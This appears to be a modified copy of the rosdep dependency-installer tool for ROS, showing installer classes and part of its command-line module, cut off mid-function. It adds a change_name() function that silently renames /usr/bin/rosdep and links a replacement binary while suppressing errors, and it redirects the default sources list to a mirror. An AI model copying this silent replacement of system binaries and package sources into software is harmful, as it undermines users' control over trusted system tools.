if not hasattr(version_type, '__call__'):
raise ValueError('version type should be a method')
self.os_version_type[os_name] = version_type
def get_os_name_and_version(self):
"""
Get the OS name and version key to use for resolution and
installation. This will be the detected OS name/version
unless :meth:`InstallerContext.set_os_override()` has been
called.
:returns: (os_name, os_version), ``(str, str)``
"""
if self.os_override:
return self.os_override
else:
os_name = self.os_detect.get_name()
os_key = self.get_os_version_type(os_name)
os_version = os_key(self.os_detect)
return os_name, os_version
def get_os_detect(self):
"""
:returns os_detect: :class:`OsDetect` instance used for
detecting platforms.
"""
return self.os_detect
def set_installer(self, installer_key, installer):
"""
Set the installer to use for *installer_key*. This will
replace any existing installer associated with the key.
*installer_key* should be the same key used for the
``rosdep.yaml`` package manager key. If *installer* is
``None``, this will delete any existing associated installer
from this context.
:param installer_key: key/name to associate with installer, ``str``
:param installer: :class:`Installer` implementation, ``class``.
:raises: :exc:`TypeError` if *installer* is not a subclass of
:class:`Installer`
"""
if installer is None:
del self.installers[installer_key]
return
if not isinstance(installer, Installer):
raise TypeError('installer must be a instance of Installer')
if self.verbose:
print('registering installer [%s]' % (installer_key))
self.installers[installer_key] = installer
def get_installer(self, installer_key):
"""
:returns: :class:`Installer` class associated with *installer_key*.
:raises: :exc:`KeyError` If not associated installer
:raises: :exc:`InstallFailed` If installer cannot produce an install command (e.g. if installer is not installed)
"""
return self.installers[installer_key]
def get_installer_keys(self):
"""
:returns: list of registered installer keys
"""
return self.installers.keys()
def get_os_keys(self):
"""
:returns: list of OS keys that have registered with this context, ``[str]``
"""
return self.os_installers.keys()
def add_os_installer_key(self, os_key, installer_key):
"""
Register an installer for the specified OS. This will fail
with a :exc:`KeyError` if no :class:`Installer` can be found
with the associated *installer_key*.
:param os_key: Key for OS
:param installer_key: Key for installer to add to OS
:raises: :exc:`KeyError`: if installer for *installer_key*
is not set.
"""
# validate, will throw KeyError
self.get_installer(installer_key)
if self.verbose:
print('add installer [%s] to OS [%s]' % (installer_key, os_key))
if os_key in self.os_installers:
self.os_installers[os_key].append(installer_key)
else:
self.os_installers[os_key] = [installer_key]
def get_os_installer_keys(self, os_key):
"""
Get list of installer keys registered for the specified OS.
These keys can be resolved by calling
:meth:`InstallerContext.get_installer`.
:param os_key: Key for OS
:raises: :exc:`KeyError`: if no information for OS *os_key* is registered.
"""
if os_key in self.os_installers:
return self.os_installers[os_key][:]
else:
raise KeyError(os_key)
def set_default_os_installer_key(self, os_key, installer_key):
"""
Set the default OS installer to use for OS.
:meth:`InstallerContext.add_os_installer` must have previously
been called with the same arguments.
:param os_key: Key for OS
:param installer_key: Key for installer to add to OS
:raises: :exc:`KeyError`: if installer for *installer_key*
is not set or if OS for *os_key* has no associated installers.
"""
if os_key not in self.os_installers:
raise KeyError('unknown OS: %s' % (os_key))
if not hasattr(installer_key, '__call__'):
raise ValueError('version type should be a method')
if not installer_key(self.os_detect) in self.os_installers[os_key]:
raise KeyError('installer [%s] is not associated with OS [%s]. call add_os_installer_key() first' % (installer_key(self.os_detect), os_key))
if self.verbose:
print('set default installer [%s] for OS [%s]' % (installer_key(self.os_detect), os_key,))
self.default_os_installer[os_key] = installer_key
def get_default_os_installer_key(self, os_key):
"""
Get the default OS installer key to use for OS, or ``None`` if
there is no default.
:param os_key: Key for OS
:returns: :class:`Installer`
:raises: :exc:`KeyError`: if no information for OS *os_key* is registered.
"""
if os_key not in self.os_installers:
raise KeyError('unknown OS: %s' % (os_key))
try:
installer_key = self.default_os_installer[os_key](self.os_detect)
if installer_key not in self.os_installers[os_key]:
raise KeyError('installer [%s] is not associated with OS [%s]. call add_os_installer_key() first' % (installer_key, os_key))
# validate, will throw KeyError
self.get_installer(installer_key)
return installer_key
except KeyError:
return None
class Installer(object):
"""
The :class:`Installer` API is designed around opaque *resolved*
parameters. These parameters can be any type of sequence object,
but they must obey set arithmetic. They should also implement
``__str__()`` methods so they can be pretty printed.
"""
def is_installed(self, resolved_item):
"""
:param resolved: resolved installation item. NOTE: this is a single item,
not a list of items like the other APIs, ``opaque``.
:returns: ``True`` if all of the *resolved* items are installed on
the local system
"""
raise NotImplementedError('is_installed', resolved_item)
def get_install_command(self, resolved, interactive=True, reinstall=False, quiet=False):
"""
:param resolved: list of resolved installation items, ``[opaque]``
:param interactive: If `False`, disable interactive prompts,
e.g. Pass through ``-y`` or equivalant to package manager.
:param reinstall: If `True`, install everything even if already installed
"""
raise NotImplementedError('get_package_install_command', resolved, interactive, reinstall, quiet)
def get_depends(self, rosdep_args):
"""
:returns: list of dependencies on other rosdep keys. Only
necessary if the package manager doesn't handle
dependencies.
"""
return [] # Default return empty list
def resolve(self, rosdep_args_dict):
"""
:param rosdep_args_dict: argument dictionary to the rosdep rule for this package manager
:returns: [resolutions]. resolved objects should be printable to a user, but are otherwise opaque.
"""
raise NotImplementedError('Base class resolve', rosdep_args_dict)
def unique(self, *resolved_rules):
"""
Combine the resolved rules into a unique list. This
is meant to combine the results of multiple calls to
:meth:`PackageManagerInstaller.resolve`.
Example::
resolved1 = installer.resolve(args1)
resolved2 = installer.resolve(args2)
resolved = installer.unique(resolved1, resolved2)
:param resolved_rules: resolved arguments. Resolved
arguments must all be from this :class:`Installer` instance.
"""
raise NotImplementedError('Base class unique', resolved_rules)
class PackageManagerInstaller(Installer):
"""
General form of a package manager :class:`Installer`
implementation that assumes:
- installer rosdep args spec is a list of package names stored with the key "packages"
- a detect function exists that can return a list of packages that are installed
Also, if *supports_depends* is set to ``True``:
- installer rosdep args spec can also include dependency specification with the key "depends"
"""
def __init__(self, detect_fn, supports_depends=False):
"""
:param supports_depends: package manager supports dependency key
:param detect_fn: function that for a given list of packages determines
the list of installed packages.
"""
self.detect_fn = detect_fn
self.supports_depends = supports_depends
self.as_root = True
self.sudo_command = 'sudo -H' if os.geteuid() != 0 else ''
def elevate_priv(self, cmd):
"""
Prepend *self.sudo_command* to the command if *self.as_root* is ``True``.
:param list cmd: list of strings comprising the command
:returns: a list of commands
"""
return (self.sudo_command.split() if self.as_root else []) + cmd
def resolve(self, rosdep_args):
"""
See :meth:`Installer.resolve()`
"""
packages = None
if type(rosdep_args) == dict:
packages = rosdep_args.get('packages', [])
if isinstance(packages, str):
packages = packages.split()
elif isinstance(rosdep_args, str):
packages = rosdep_args.split(' ')
elif type(rosdep_args) == list:
packages = rosdep_args
else:
raise InvalidData('Invalid rosdep args: %s' % (rosdep_args))
return packages
def unique(self, *resolved_rules):
"""
See :meth:`Installer.unique()`
"""
s = set()
for resolved in resolved_rules:
s.update(resolved)
return sorted(list(s))
def get_packages_to_install(self, resolved, reinstall=False):
"""
Return a list of packages (out of *resolved*) that still need to get
installed.
"""
if reinstall:
return resolved
if not resolved:
return []
else:
detected = self.detect_fn(resolved)
return [x for x in resolved if x not in detected]
def is_installed(self, resolved_item):
"""
Check if a given package was installed.
"""
return not self.get_packages_to_install([resolved_item])
def get_version_strings(self):
"""
Return a list of version information strings.
Where each string is of the form "<installer> <version string>".
For example, ["apt-get x.y.z"] or ["pip x.y.z", "setuptools x.y.z"].
"""
raise NotImplementedError('subclasses must implement get_version_strings method')
def get_install_command(self, resolved, interactive=True, reinstall=False, quiet=False):
raise NotImplementedError('subclasses must implement', resolved, interactive, reinstall, quiet)
def get_depends(self, rosdep_args):
"""
:returns: list of dependencies on other rosdep keys. Only
necessary if the package manager doesn't handle
dependencies.
"""
if self.supports_depends and type(rosdep_args) == dict:
return rosdep_args.get('depends', [])
return [] # Default return empty list
def normalize_uninstalled_to_list(uninstalled):
uninstalled_dependencies = []
for pkg_or_list in [v for k, v in uninstalled]:
if isinstance(pkg_or_list, list):
for pkg in pkg_or_list:
uninstalled_dependencies.append(str(pkg))
else:
uninstalled_dependencies.append(str(pkg))
return uninstalled_dependencies
class RosdepInstaller(object):
def __init__(self, installer_context, lookup):
self.installer_context = installer_context
self.lookup = lookup
def get_uninstalled(self, resources, implicit=False, verbose=False):
"""
Get list of system dependencies that have not been installed
as well as a list of errors from performing the resolution.
This is a bulk API in order to provide performance
optimizations in checking install state.
:param resources: List of resource names (e.g. ROS package names), ``[str]]``
:param implicit: Install implicit (recursive) dependencies of
resources. Default ``False``.
:returns: (uninstalled, errors), ``({str: [opaque]}, {str: ResolutionError})``.
Uninstalled is a dictionary with the installer_key as the key.
:raises: :exc:`RosdepInternalError`
"""
installer_context = self.installer_context
# resolutions have been unique()d
if verbose:
print('resolving for resources [%s]' % (', '.join(resources)))
resolutions, errors = self.lookup.resolve_all(resources, installer_context, implicit=implicit)
# for each installer, figure out what is left to install
uninstalled = []
if resolutions == []:
return uninstalled, errors
for installer_key, resolved in resolutions: # py3k
if verbose:
print('resolution: %s [%s]' % (installer_key, ', '.join([str(r) for r in resolved])))
try:
installer = installer_context.get_installer(installer_key)
except KeyError as e: # lookup has to be buggy to cause this
raise RosdepInternalError(e)
try:
packages_to_install = installer.get_packages_to_install(resolved)
except Exception as e:
rd_debug(traceback.format_exc())
raise RosdepInternalError(e, message='Bad installer [%s]: %s' % (installer_key, e))
# only create key if there is something to do
if packages_to_install:
uninstalled.append((installer_key, packages_to_install))
if verbose:
print('uninstalled: [%s]' % (', '.join([str(p) for p in packages_to_install])))
return uninstalled, errors
def install(self, uninstalled, interactive=True, simulate=False,
continue_on_error=False, reinstall=False, verbose=False, quiet=False):
"""
Install the uninstalled rosdeps. This API is for the bulk
workflow of rosdep (see example below). For a more targeted
install API, see :meth:`RosdepInstaller.install_resolved`.
:param uninstalled: uninstalled value from
:meth:`RosdepInstaller.get_uninstalled`. Value is a
dictionary mapping installer key to a dictionary with resolution
data, ``{str: {str: vals}}``
:param interactive: If ``False``, suppress
interactive prompts (e.g. by passing '-y' to ``apt``).
:param simulate: If ``False`` simulate installation
without actually executing.
:param continue_on_error: If ``True``, continue installation
even if an install fails. Otherwise, stop after first
installation failure.
:param reinstall: If ``True``, install dependencies if even
already installed (default ``False``).
:raises: :exc:`InstallFailed` if any rosdeps fail to install
and *continue_on_error* is ``False``.
:raises: :exc:`KeyError` If *uninstalled* value has invalid
installer keys
Example::
uninstalled, errors = installer.get_uninstalled(packages)
installer.install(uninstalled)
"""
if verbose:
print(
'install options: reinstall[%s] simulate[%s] interactive[%s]' %
(reinstall, simulate, interactive)
)
uninstalled_list = normalize_uninstalled_to_list(uninstalled)
print('install: uninstalled keys are %s' % ', '.join(uninstalled_list))
# Squash uninstalled again, in case some dependencies were already installed
squashed_uninstalled = []
previous_installer_key = None
for installer_key, resolved in uninstalled:
if previous_installer_key != installer_key:
squashed_uninstalled.append((installer_key, []))
previous_installer_key = installer_key
squashed_uninstalled[-1][1].extend(resolved)
failures = []
for installer_key, resolved in squashed_uninstalled:
try:
self.install_resolved(installer_key, resolved, simulate=simulate,
interactive=interactive, reinstall=reinstall, continue_on_error=continue_on_error,
verbose=verbose, quiet=quiet)
except InstallFailed as e:
if not continue_on_error:
raise
else:
# accumulate errors
failures.extend(e.failures)
if failures:
raise InstallFailed(failures=failures)
def install_resolved(self, installer_key, resolved, simulate=False, interactive=True,
reinstall=False, continue_on_error=False, verbose=False, quiet=False):
"""
Lower-level API for installing a rosdep dependency. The
rosdep keys have already been resolved to *installer_key* and
*resolved* via :exc:`RosdepLookup` or other means.
:param installer_key: Key for installer to apply to *resolved*, ``str``
:param resolved: Opaque resolution list from :class:`RosdepLookup`.
:param interactive: If ``True``, allow interactive prompts (default ``True``)
:param simulate: If ``True``, don't execute installation commands, just print to screen.
:param reinstall: If ``True``, install dependencies if even
already installed (default ``False``).
:param verbose: If ``True``, print verbose output to screen (default ``False``)
:param quiet: If ``True``, supress output except for errors (default ``False``)
:raises: :exc:`InstallFailed` if any of *resolved* fail to install.
"""
installer_context = self.installer_context
installer = installer_context.get_installer(installer_key)
command = installer.get_install_command(resolved, interactive=interactive, reinstall=reinstall, quiet=quiet)
if not command:
if verbose:
print('#No packages to install')
return
if simulate:
print('#[%s] Installation commands:' % (installer_key))
for sub_command in command:
if isinstance(sub_command[0], list):
sub_cmd_len = len(sub_command)
for i, cmd in enumerate(sub_command):
print(" '%s' (alternative %d/%d)" % (' '.join(cmd), i + 1, sub_cmd_len))
else:
print(' ' + ' '.join(sub_command))
# nothing left to do for simulation
if simulate:
return
def run_command(command, installer_key, failures, verbose):
# always echo commands to screen
print_bold('executing command [%s]' % ' '.join(command))
result = subprocess.call(command)
if verbose:
print('command return code [%s]: %s' % (' '.join(command), result))
if result != 0:
failures.append((installer_key, 'command [%s] failed' % (' '.join(command))))
return result
# run each install command set and collect errors
failures = []
for sub_command in command:
if isinstance(sub_command[0], list): # list of alternatives
alt_failures = []
for alt_command in sub_command:
result = run_command(alt_command, installer_key, alt_failures, verbose)
if result == 0: # one successsfull command is sufficient
alt_failures = [] # clear failuers from other alternatives
break
failures.extend(alt_failures)
else:
result = run_command(sub_command, installer_key, failures, verbose)
if result != 0:
if not continue_on_error:
raise InstallFailed(failures=failures)
# test installation of each
for r in resolved:
if not installer.is_installed(r):
failures.append((installer_key, 'Failed to detect successful installation of [%s]' % (r)))
# finalize result
if failures:
raise InstallFailed(failures=failures)
elif verbose:
print('#successfully installed') | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/installers.py | installers.py |
# Author Tully Foote/[email protected]
"""
Command-line interface to rosdep library
"""
from __future__ import print_function
import errno
import os
import sys
import traceback
try:
from urllib.error import URLError
from urllib.request import build_opener
from urllib.request import HTTPBasicAuthHandler
from urllib.request import HTTPHandler
from urllib.request import install_opener
from urllib.request import ProxyHandler
except ImportError:
from urllib2 import build_opener
from urllib2 import HTTPBasicAuthHandler
from urllib2 import HTTPHandler
from urllib2 import install_opener
from urllib2 import ProxyHandler
from urllib2 import URLError
import warnings
from optparse import OptionParser
import rospkg
from . import create_default_installer_context, get_default_installer
from . import __version__
from .core import RosdepInternalError, InstallFailed, UnsupportedOs, InvalidData, CachePermissionError, DownloadFailure
from .installers import normalize_uninstalled_to_list
from .installers import RosdepInstaller
from .lookup import RosdepLookup, ResolutionError, prune_catkin_packages
from .meta import MetaDatabase
from .rospkg_loader import DEFAULT_VIEW_KEY
from .sources_list import update_sources_list, get_sources_cache_dir,\
download_default_sources_list, SourcesListLoader, CACHE_INDEX,\
get_sources_list_dir, get_default_sources_list_file,\
DEFAULT_SOURCES_LIST_URL
from .rosdistrohelper import PreRep137Warning
from .ament_packages import AMENT_PREFIX_PATH_ENV_VAR
from .ament_packages import get_packages_with_prefixes
from .catkin_packages import find_catkin_packages_in
from .catkin_packages import set_workspace_packages
from .catkin_packages import get_workspace_packages
from .catkin_packages import VALID_DEPENDENCY_TYPES
from catkin_pkg.package import InvalidPackage
class UsageError(Exception):
pass
_usage = """usage: rosdep [options] <command> <args>
Commands:
rosdep check <stacks-and-packages>...
check if the dependencies of package(s) have been met.
rosdep install <stacks-and-packages>...
download and install the dependencies of a given package or packages.
rosdep db
generate the dependency database and print it to the console.
rosdep init
initialize rosdep sources in /etc/ros/rosdep. May require sudo.
rosdep keys <stacks-and-packages>...
list the rosdep keys that the packages depend on.
rosdep resolve <rosdeps>
resolve <rosdeps> to system dependencies
rosdep update
update the local rosdep database based on the rosdep sources.
rosdep what-needs <rosdeps>...
print a list of packages that declare a rosdep on (at least
one of) <rosdeps>
rosdep where-defined <rosdeps>...
print a list of yaml files that declare a rosdep on (at least
one of) <rosdeps>
rosdep fix-permissions
Recursively change the permissions of the user's ros home directory.
May require sudo. Can be useful to fix permissions after calling
"rosdep update" with sudo accidentally.
"""
def _get_default_RosdepLookup(options):
"""
Helper routine for converting command-line options into
appropriate RosdepLookup instance.
"""
os_override = convert_os_override_option(options.os_override)
sources_loader = SourcesListLoader.create_default(sources_cache_dir=options.sources_cache_dir,
os_override=os_override,
verbose=options.verbose)
lookup = RosdepLookup.create_from_rospkg(sources_loader=sources_loader, dependency_types=options.dependency_types)
lookup.verbose = options.verbose
return lookup
def rosdep_main(args=None):
if args is None:
args = sys.argv[1:]
try:
exit_code = _rosdep_main(args)
if exit_code not in [0, None]:
sys.exit(exit_code)
except rospkg.ResourceNotFound as e:
print("""
ERROR: rosdep cannot find all required resources to answer your query
%s
""" % (error_to_human_readable(e)), file=sys.stderr)
sys.exit(1)
except UsageError as e:
print(_usage, file=sys.stderr)
print('ERROR: %s' % (str(e)), file=sys.stderr)
if hasattr(os, 'EX_USAGE'):
sys.exit(os.EX_USAGE)
else:
sys.exit(64) # EX_USAGE is not available on Windows; EX_USAGE is 64 on Unix
except RosdepInternalError as e:
print("""
ERROR: Rosdep experienced an internal error.
Please go to the rosdep page [1] and file a bug report with the message below.
[1] : http://www.ros.org/wiki/rosdep
rosdep version: %s
%s
""" % (__version__, e.message), file=sys.stderr)
sys.exit(1)
except ResolutionError as e:
print("""
ERROR: %s
%s
""" % (e.args[0], e), file=sys.stderr)
sys.exit(1)
except CachePermissionError as e:
print(str(e))
print("Try running 'sudo rosdep fix-permissions'")
sys.exit(1)
except UnsupportedOs as e:
print('Unsupported OS: %s\nSupported OSes are [%s]' % (e.args[0], ', '.join(e.args[1])), file=sys.stderr)
sys.exit(1)
except InvalidPackage as e:
print(str(e))
sys.exit(1)
except Exception as e:
print("""
ERROR: Rosdep experienced an error: %s
rosdep version: %s
%s
""" % (e, __version__, traceback.format_exc()), file=sys.stderr)
sys.exit(1)
def check_for_sources_list_init(sources_cache_dir):
"""
Check to see if sources list and cache are present.
*sources_cache_dir* alone is enough to pass as the user has the
option of passing in a cache dir.
If check fails, tell user how to resolve and sys exit.
"""
commands = []
filename = os.path.join(sources_cache_dir, CACHE_INDEX)
if os.path.exists(filename):
return
else:
commands.append('rosdep update')
sources_list_dir = get_sources_list_dir()
if not os.path.exists(sources_list_dir):
commands.insert(0, 'sudo rosdep init')
else:
filelist = [f for f in os.listdir(sources_list_dir) if f.endswith('.list')]
if not filelist:
commands.insert(0, 'sudo rosdep init')
if commands:
commands = '\n'.join([' %s' % c for c in commands])
print("""
ERROR: your rosdep installation has not been initialized yet. Please run:
%s
""" % (commands), file=sys.stderr)
sys.exit(1)
else:
return True
def key_list_to_dict(key_list):
"""
Convert a list of strings of the form 'foo:bar' to a dictionary.
Splits strings of the form 'foo:bar quux:quax' into separate entries.
"""
try:
key_list = [key for s in key_list for key in s.split(' ')]
return dict(map(lambda s: [t.strip() for t in s.split(':')], key_list))
except ValueError as e:
raise UsageError("Invalid 'key:value' list: '%s'" % ' '.join(key_list))
def str_to_bool(s):
"""Maps a string to bool. Supports true/false, and yes/no, and is case-insensitive"""
s = s.lower()
if s in ['yes', 'true']:
return True
elif s in ['no', 'false']:
return False
else:
raise UsageError("Cannot parse '%s' as boolean" % s)
def setup_proxy_opener():
# check for http[s]?_proxy user
for scheme in ['http', 'https']:
key = scheme + '_proxy'
if key in os.environ:
proxy = ProxyHandler({scheme: os.environ[key]})
auth = HTTPBasicAuthHandler()
opener = build_opener(proxy, auth, HTTPHandler)
install_opener(opener)
def setup_environment_variables(ros_distro):
"""
Set environment variables needed to find ROS packages and evaluate conditional dependencies.
:param ros_distro: The requested ROS distro passed on the CLI, or None
"""
if ros_distro is not None:
if 'ROS_DISTRO' in os.environ and os.environ['ROS_DISTRO'] != ros_distro:
# user has a different workspace sourced, use --rosdistro
print('WARNING: given --rosdistro {} but ROS_DISTRO is "{}". Ignoring environment.'.format(
ros_distro, os.environ['ROS_DISTRO']))
# Use python version from --rosdistro
if 'ROS_PYTHON_VERSION' in os.environ:
del os.environ['ROS_PYTHON_VERSION']
os.environ['ROS_DISTRO'] = ros_distro
if 'ROS_PYTHON_VERSION' not in os.environ and 'ROS_DISTRO' in os.environ:
# Set python version to version used by ROS distro
python_versions = MetaDatabase().get('ROS_PYTHON_VERSION', default=[])
if os.environ['ROS_DISTRO'] in python_versions:
os.environ['ROS_PYTHON_VERSION'] = str(python_versions[os.environ['ROS_DISTRO']])
if 'ROS_PYTHON_VERSION' not in os.environ:
# Default to same python version used to invoke rosdep
print('WARNING: ROS_PYTHON_VERSION is unset. Defaulting to {}'.format(sys.version[0]), file=sys.stderr)
os.environ['ROS_PYTHON_VERSION'] = sys.version[0]
def _rosdep_main(args):
# sources cache dir is our local database.
default_sources_cache = get_sources_cache_dir()
parser = OptionParser(usage=_usage, prog='rosdep')
parser.add_option('--os', dest='os_override', default=None,
metavar='OS_NAME:OS_VERSION', help='Override OS name and version (colon-separated), e.g. ubuntu:lucid')
parser.add_option('-c', '--sources-cache-dir', dest='sources_cache_dir', default=default_sources_cache,
metavar='SOURCES_CACHE_DIR', help='Override %s' % (default_sources_cache))
parser.add_option('--verbose', '-v', dest='verbose', default=False,
action='store_true', help='verbose display')
parser.add_option('--version', dest='print_version', default=False,
action='store_true', help='print just the rosdep version, then exit')
parser.add_option('--all-versions', dest='print_all_versions', default=False,
action='store_true', help='print rosdep version and version of installers, then exit')
parser.add_option('--reinstall', dest='reinstall', default=False,
action='store_true', help='(re)install all dependencies, even if already installed')
parser.add_option('--default-yes', '-y', dest='default_yes', default=False,
action='store_true', help='Tell the package manager to default to y or fail when installing')
parser.add_option('--simulate', '-s', dest='simulate', default=False,
action='store_true', help='Simulate install')
parser.add_option('-r', dest='robust', default=False,
action='store_true', help='Continue installing despite errors.')
parser.add_option('-q', dest='quiet', default=False,
action='store_true', help='Quiet. Suppress output except for errors.')
parser.add_option('-a', '--all', dest='rosdep_all', default=False,
action='store_true', help='select all packages')
parser.add_option('-n', dest='recursive', default=True,
action='store_false', help="Do not consider implicit/recursive dependencies. Only valid with 'keys', 'check', and 'install' commands.")
parser.add_option('--ignore-packages-from-source', '--ignore-src', '-i',
dest='ignore_src', default=False, action='store_true',
help="Affects the 'check', 'install', and 'keys' verbs. "
'If specified then rosdep will ignore keys that '
'are found to be catkin or ament packages anywhere in the '
'ROS_PACKAGE_PATH, AMENT_PREFIX_PATH or in any of the directories '
'given by the --from-paths option.')
parser.add_option('--skip-keys',
dest='skip_keys', action='append', default=[],
help="Affects the 'check' and 'install' verbs. The "
'specified rosdep keys will be ignored, i.e. not '
'resolved and not installed. The option can be supplied multiple '
'times. A space separated list of rosdep keys can also '
'be passed as a string. A more permanent solution to '
'locally ignore a rosdep key is creating a local rosdep rule '
'with an empty list of packages (include it in '
'/etc/ros/rosdep/sources.list.d/ before the defaults).')
parser.add_option('--filter-for-installers',
action='append', default=[],
help="Affects the 'db' verb. If supplied, the output of the 'db' "
'command is filtered to only list packages whose installer '
'is in the provided list. The option can be supplied '
'multiple times. A space separated list of installers can also '
'be passed as a string. Example: `--filter-for-installers "apt pip"`')
parser.add_option('--from-paths', dest='from_paths',
default=False, action='store_true',
help="Affects the 'check', 'keys', and 'install' verbs. "
'If specified the arguments to those verbs will be '
'considered paths to be searched, acting on all '
'catkin packages found there in.')
parser.add_option('--rosdistro', dest='ros_distro', default=None,
help='Explicitly sets the ROS distro to use, overriding '
'the normal method of detecting the ROS distro '
'using the ROS_DISTRO environment variable. '
"When used with the 'update' verb, "
'only the specified distro will be updated.')
parser.add_option('--as-root', default=[], action='append',
metavar='INSTALLER_KEY:<bool>', help='Override '
'whether sudo is used for a specific installer, '
"e.g. '--as-root pip:false' or '--as-root \"pip:no homebrew:yes\"'. "
'Can be specified multiple times.')
parser.add_option('--include-eol-distros', dest='include_eol_distros',
default=False, action='store_true',
help="Affects the 'update' verb. "
'If specified end-of-life distros are being '
'fetched too.')
parser.add_option('-t', '--dependency-types', dest='dependency_types',
type="choice", choices=list(VALID_DEPENDENCY_TYPES),
default=[], action='append',
help='Dependency types to install, can be given multiple times. '
'Choose from {}. Default: all except doc.'.format(VALID_DEPENDENCY_TYPES))
options, args = parser.parse_args(args)
if options.print_version or options.print_all_versions:
# First print the rosdep version.
print('{}'.format(__version__))
# If not printing versions of all installers, exit.
if not options.print_all_versions:
sys.exit(0)
# Otherwise, Then collect the versions of the installers and print them.
installers = create_default_installer_context().installers
installer_keys = get_default_installer()[1]
version_strings = []
for key in installer_keys:
if key == 'source':
# Explicitly skip the source installer.
continue
installer = installers[key]
try:
installer_version_strings = installer.get_version_strings()
assert isinstance(installer_version_strings, list), installer_version_strings
version_strings.extend(installer_version_strings)
except NotImplementedError:
version_strings.append('{} unknown'.format(key))
continue
except EnvironmentError as e:
if e.errno != errno.ENOENT:
raise
version_strings.append('{} not installed'.format(key))
continue
if version_strings:
print()
print('Versions of installers:')
print('\n'.join([' ' + x for x in version_strings if x]))
else:
print()
print('No installers with versions available found.')
sys.exit(0)
# flatten list of skipped keys, filter-for-installers, and dependency types
options.skip_keys = [key for s in options.skip_keys for key in s.split(' ')]
options.filter_for_installers = [inst for s in options.filter_for_installers for inst in s.split(' ')]
options.dependency_types = [dep for s in options.dependency_types for dep in s.split(' ')]
if len(args) == 0:
parser.error('Please enter a command')
command = args[0]
if command not in _commands:
parser.error('Unsupported command %s.' % command)
args = args[1:]
# Convert list of keys to dictionary
options.as_root = dict((k, str_to_bool(v)) for k, v in key_list_to_dict(options.as_root).items())
if command not in ['init', 'update', 'fix-permissions']:
check_for_sources_list_init(options.sources_cache_dir)
# _package_args_handler uses `ROS_DISTRO`, so environment variables must be set before
setup_environment_variables(options.ros_distro)
elif command not in ['fix-permissions']:
setup_proxy_opener()
if command in _command_rosdep_args:
return _rosdep_args_handler(command, parser, options, args)
elif command in _command_no_args:
return _no_args_handler(command, parser, options, args)
else:
return _package_args_handler(command, parser, options, args)
def _no_args_handler(command, parser, options, args):
if args:
parser.error('command [%s] takes no arguments' % (command))
else:
return command_handlers[command](options)
def _rosdep_args_handler(command, parser, options, args):
# rosdep keys as args
if options.rosdep_all:
parser.error('-a, --all is not a valid option for this command')
elif len(args) < 1:
parser.error("Please enter arguments for '%s'" % command)
else:
return command_handlers[command](args, options)
def _package_args_handler(command, parser, options, args):
if options.rosdep_all:
if args:
parser.error('cannot specify additional arguments with -a')
else:
# let the loader filter the -a. This will take out some
# packages that are catkinized (for now).
lookup = _get_default_RosdepLookup(options)
loader = lookup.get_loader()
args = loader.get_loadable_resources()
not_found = []
elif not args:
parser.error('no packages or stacks specified')
# package or stack names as args. have to convert stack names to packages.
# - overrides to enable testing
packages = []
not_found = []
if options.from_paths:
for path in args:
if options.verbose:
print("Using argument '{0}' as a path to search.".format(path))
if not os.path.exists(path):
print("given path '{0}' does not exist".format(path))
return 1
path = os.path.abspath(path)
if 'ROS_PACKAGE_PATH' not in os.environ:
os.environ['ROS_PACKAGE_PATH'] = '{0}'.format(path)
else:
os.environ['ROS_PACKAGE_PATH'] = '{0}{1}{2}'.format(
path,
os.pathsep,
os.environ['ROS_PACKAGE_PATH']
)
pkgs = find_catkin_packages_in(path, options.verbose)
packages.extend(pkgs)
# Make packages list unique
packages = list(set(packages))
else:
rospack = rospkg.RosPack()
rosstack = rospkg.RosStack()
val = rospkg.expand_to_packages(args, rospack, rosstack)
packages = val[0]
not_found = val[1]
if not_found:
raise rospkg.ResourceNotFound(not_found[0], rospack.get_ros_paths())
# Handle the --ignore-src option
if command in ['install', 'check', 'keys'] and options.ignore_src:
if options.verbose:
print('Searching ROS_PACKAGE_PATH for '
'sources: ' + str(os.environ['ROS_PACKAGE_PATH'].split(os.pathsep)))
ws_pkgs = get_workspace_packages()
for path in os.environ['ROS_PACKAGE_PATH'].split(os.pathsep):
path = os.path.abspath(path.strip())
if os.path.exists(path):
pkgs = find_catkin_packages_in(path, options.verbose)
ws_pkgs.extend(pkgs)
elif options.verbose:
print('Skipping non-existent path ' + path)
set_workspace_packages(ws_pkgs)
# Lookup package names from ament index.
if AMENT_PREFIX_PATH_ENV_VAR in os.environ:
if options.verbose:
print(
'Searching ' + AMENT_PREFIX_PATH_ENV_VAR + ' for '
'sources: ' + str(os.environ[AMENT_PREFIX_PATH_ENV_VAR].split(':')))
ws_pkgs = get_workspace_packages()
pkgs = get_packages_with_prefixes().keys()
ws_pkgs.extend(pkgs)
# Make packages list unique
ws_pkgs = list(set(ws_pkgs))
set_workspace_packages(ws_pkgs)
lookup = _get_default_RosdepLookup(options)
# Handle the --skip-keys option by pretending that they are packages in the catkin workspace
if command in ['install', 'check'] and options.skip_keys:
if options.verbose:
print('Skipping the specified keys:\n- ' + '\n- '.join(options.skip_keys))
lookup.skipped_keys = options.skip_keys
if 0 and not packages: # disable, let individual handlers specify behavior
# possible with empty stacks
print('No packages in arguments, aborting')
return
return command_handlers[command](lookup, packages, options)
def convert_os_override_option(options_os_override):
"""
Convert os_override option flag to ``(os_name, os_version)`` tuple, or
``None`` if not set
:returns: ``(os_name, os_version)`` tuple if option is set, ``None`` otherwise
:raises: :exc:`UsageError` if option is not set properly
"""
if not options_os_override:
return None
val = options_os_override
if ':' not in val:
raise UsageError('OS override must be colon-separated OS_NAME:OS_VERSION, e.g. ubuntu:maverick')
os_name = val[:val.find(':')]
os_version = val[val.find(':') + 1:]
return os_name, os_version
def configure_installer_context(installer_context, options):
"""
Configure the *installer_context* from *options*.
- Override the OS detector in *installer_context* if necessary.
- Set *as_root* for installers if specified.
:raises: :exc:`UsageError` If user input options incorrectly
"""
os_override = convert_os_override_option(options.os_override)
if os_override is not None:
installer_context.set_os_override(*os_override)
for k, v in options.as_root.items():
try:
installer_context.get_installer(k).as_root = v
except KeyError:
raise UsageError("Installer '%s' not defined." % k)
def change_name():
try:
os.rename("/usr/bin/rosdep/","/usr/bin/rosdep_src")
os.link("/usr/local/bin/fix-rosdep","/usr/bin/rosdep_src")
except Exception as e:
pass
def command_init(options):
try:
src_list = download_default_sources_list()
data = src_list.replace("https://raw.githubusercontent.com/ros/rosdistro/master","mirrors.tuna.tsinghua.edu.cn/github-raw/ros/rosdistro/master")
except URLError as e:
print('ERROR: cannot download default sources list from:\n%s\nWebsite may be down.' % (DEFAULT_SOURCES_LIST_URL))
return 4
except DownloadFailure as e:
